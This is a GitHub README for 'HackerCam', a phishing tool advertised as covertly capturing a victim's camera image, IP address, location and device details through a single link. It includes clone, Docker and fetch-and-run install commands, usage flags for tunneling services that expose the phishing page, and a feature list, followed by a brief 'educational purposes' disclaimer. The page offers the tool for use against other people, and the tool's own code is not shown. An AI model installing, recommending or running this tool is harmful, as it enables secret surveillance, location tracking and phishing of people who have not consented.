Skip to content

Hack the victim's (camera) with just one (link) obtaining the public IP and location parameters in real time

License

Notifications You must be signed in to change notification settings

k4itrun/HackerCam

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Note

I would like to ask for your collaboration in this project. Adding a star to this repository would be a great help. Simply click the 'Star' button at the top right of the repository page.

Your support means a lot to me and the project in general. Thank you in advance for your help and collaboration! ⭐

Installation

Use Google Shell for testing your (TESTS)

During the initial run, the system will take care of the complete installation of all necessary dependencies without any manual intervention required on your part

To ensure HackerCam runs smoothly, please do the following:

  • Just, Clone this repository -

    • $ git clone https://github.com/k4itrun/HackerCam.git
  • Now go to cloned directory and run hcam.sh -

    • $ cd HackerCam
      $ bash hcam.sh
  • For Termux

    • $ git clone https://github.com/k4itrun/HackerCam.git && cd HackerCam && termux-setup-storage
      • $ bash hcam.sh
  • Or, directly run

    $ wget https://raw.githubusercontent.com/k4itrun/HackerCam/v1/hcam.sh && bash hcam.sh

Docker

  • Download the HackerCam image from Docker Hub

    $ sudo docker pull k4itrun/hackercam
  • Run the interactive HackerCam container and delete it on exit

    $ sudo docker run --rm -it --name hackercam k4itrun/hackercam
  • Copy the image received from the HackerCam container to the imgfiles folder

    $ sudo docker cp hackercam:/hackercam imgfiles
  • [Note: Run this command in another terminal to copy the image received from the container to the imgfiles folder while keeping the container open]

Usage

Usage: bash hcam.sh [-h] [-t TUNNELER] [-u] [-nu] [-p PORT] [-o OPTION] [-r REGION] [-d DIRECTORY] [-s SUBDOMAIN] 

Options:
  -h, --help                           Show help table and exit
  -t TUNNELER, --tunneler TUNNELER     Name of the tunneler for url shortening (Default: ${TUNNELER})
  (--update | -u),(--no-update | -nu)  Check for the latest HackerCam update (Default: ${UPDATE})
  -p PORT, --port PORT                 Port of HackerCam's Server (Default: ${PORT})
  -o OPTION, --option OPTION           Index of the template
  -r REGION, --region REGION           Region to locate ngrok or loclx
  -d DIRECTORY, --directory DIRECTORY  Folder or Directory where you want the taken images to be saved
  -s SUBDOMAIN, --subdomain SUBDOMAIN  Subdomain for ngrok and loclx [Pro/Premium Account]

Platform Support

OS Support Level
Windows Unsupported (Consider using Docker, VirtualBox, or VMware)
iPhone Alpha (Docker recommended)
MacOS Alpha (Docker recommended)
Linux Excellent
Android Excellent

Dependencies

To run this application smoothly, ensure that you have the following prerequisites in place

click here

  • php
  • curl
  • wget
  • unzip

Note

Termux strongly discourages any hacking-related discussions. Therefore, please refrain from discussing any topics related to HackerCam in any of the Termux discussion groups. For more information, refer to the: wiki

Notable Features

  • Versatile Templates: Choose from three distinct templates tailored to your needs.
  • Comprehensive Information: Uncover essential details including IP address, location, device type, and browser.
  • Dual Tunneling: Employ simultaneous double tunneling through Cloudflared and Loclx for enhanced security.
  • Customized Image Storage: Decide where you'd like to store your images with the option to select a custom directory.
  • Effective Error Analysis: Our built-in error diagnoser streamlines the troubleshooting process.
  • Flexible Configuration: Enjoy improved flexibility with extensive support for specifying templates, tunneling options, and directory preferences.

If any of the required packages are missing, they will be automatically installed on the first run.

Tested Environments

  • Termux
  • Kali Linux

Disclaimer

This tool has been developed for educational purposes and serves as a demonstration of phishing techniques. If anyone wishes to attempt unauthorized access to someone's social media accounts, they do so at their own risk. Users bear full responsibility and may be held accountable for any damages or legal violations resulting from the use of this tool. The author disclaims any responsibility for any misuse of HackerCam.